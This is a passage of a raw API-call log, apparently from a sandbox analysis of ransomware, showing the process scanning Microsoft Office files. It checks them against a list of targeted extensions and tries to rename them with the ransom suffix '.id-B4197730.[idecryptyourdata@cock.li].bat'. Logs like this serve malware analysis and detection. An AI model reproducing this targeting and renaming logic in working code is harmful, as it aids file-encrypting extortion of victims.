lpString2=".xml") returned -1 [0175.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.188] lstrlenW (lpString=".jpg") returned 4 [0175.188] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0175.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.188] lstrlenW (lpString=".doc") returned 4 [0175.188] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString=".docx") returned 5 [0175.189] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0175.189] lstrlenW (lpString=".pdf") returned 4 [0175.189] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString=".xls") returned 4 [0175.189] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString=".xlsx") returned 5 [0175.189] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0175.189] lstrlenW (lpString=".ppt") returned 4 [0175.189] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.189] lstrlenW (lpString=".zip") returned 4 [0175.189] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0175.189] lstrlenW (lpString=".rar") returned 4 [0175.189] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString=".bz2") returned 4 [0175.189] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString=".7z") returned 3 [0175.189] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0175.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.189] lstrlenW (lpString=".dbf") returned 4 [0175.189] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.189] lstrlenW (lpString=".1cd") returned 4 [0175.189] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0175.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.189] lstrlenW (lpString=".jpg") returned 4 [0175.189] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0175.190] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0175.190] lstrlenW (lpString="Blue Green.xml") returned 14 [0175.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.190] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=744) returned 1 [0175.190] CloseHandle (hObject=0x530) returned 1 [0175.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml")) returned 0x220 [0175.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0175.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.191] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.191] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue green.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.192] CloseHandle (hObject=0x530) returned 1 [0175.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml") returned 85 [0175.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml") returned 85 [0175.192] lstrlenW (lpString=".doc") returned 4 [0175.192] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0175.192] lstrlenW (lpString=".docx") returned 5 [0175.192] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0175.192] lstrlenW (lpString=".pdf") returned 4 [0175.192] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0175.192] lstrlenW (lpString=".xls") returned 4 [0175.192] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0175.192] lstrlenW (lpString=".xlsx") returned 5 [0175.192] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0175.192] lstrlenW (lpString=".ppt") returned 4 [0175.192] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0175.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml") returned 85 [0175.192] lstrlenW (lpString=".zip") returned 4 [0175.192] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0175.192] lstrlenW (lpString=".rar") returned 4 [0175.192] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0175.193] lstrlenW (lpString=".bz2") returned 4 [0175.193] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0175.193] lstrlenW (lpString=".7z") returned 3 [0175.193] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0175.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Green.xml") returned 85 [0175.193] lstrlenW (lpString=".dbf") returned 4 [0175.193] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0175.195] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.195] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue II.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue ii.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.195] CloseHandle (hObject=0x530) returned 1 [0175.196] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.196] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Warm.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue warm.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.196] CloseHandle (hObject=0x530) returned 1 [0175.197] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.197] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.197] CloseHandle (hObject=0x530) returned 1 [0175.198] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.198] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Grayscale.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\grayscale.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.198] CloseHandle (hObject=0x530) returned 1 [0175.199] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.199] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green Yellow.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green yellow.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.199] CloseHandle (hObject=0x530) returned 1 [0175.200] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.200] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.200] CloseHandle (hObject=0x530) returned 1 [0175.201] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.201] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Marquee.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\marquee.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.201] CloseHandle (hObject=0x530) returned 1 [0175.202] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.202] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Median.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\median.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.203] CloseHandle (hObject=0x530) returned 1 [0175.203] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.203] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Office 2007 - 2010.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\office 2007 - 2010.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.204] CloseHandle (hObject=0x530) returned 1 [0176.061] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.061] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.088] CloseHandle (hObject=0x544) returned 1 [0176.131] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.131] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\COFFEE.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\coffee.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.132] CloseHandle (hObject=0x530) returned 1 [0176.133] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.133] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE.POTX.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate.potx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.133] CloseHandle (hObject=0x530) returned 1 [0176.134] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.134] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE2.POTX.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate2.potx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.134] CloseHandle (hObject=0x530) returned 1 [0176.135] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.135] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PRIMARY.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\primary.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.135] CloseHandle (hObject=0x530) returned 1 [0176.136] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.136] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.DOC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.doc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.136] CloseHandle (hObject=0x530) returned 1 [0176.137] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.137] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.PPT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.ppt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.137] CloseHandle (hObject=0x530) returned 1 [0176.139] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.139] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLN.XLS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottpln.xls.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.139] CloseHandle (hObject=0x530) returned 1 [0176.144] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.145] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.DOC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.doc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.145] CloseHandle (hObject=0x530) returned 1 [0176.146] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.146] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.PPT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.ppt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.146] CloseHandle (hObject=0x530) returned 1 [0176.147] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.147] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.XLS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.xls.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.147] CloseHandle (hObject=0x530) returned 1 [0176.148] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.148] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHKEY.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchkey.dat.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.148] CloseHandle (hObject=0x530) returned 1 [0176.149] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLEX.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlex.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLEX.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlex.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.149] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.149] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLTS.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlts.dat.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.150] CloseHandle (hObject=0x530) returned 1 [0176.150] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.150] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHPHN.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchphn.dat.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.151] CloseHandle (hObject=0x530) returned 1 [0176.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHSRN.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchsrn.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHSRN.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchsrn.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.155] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.155] 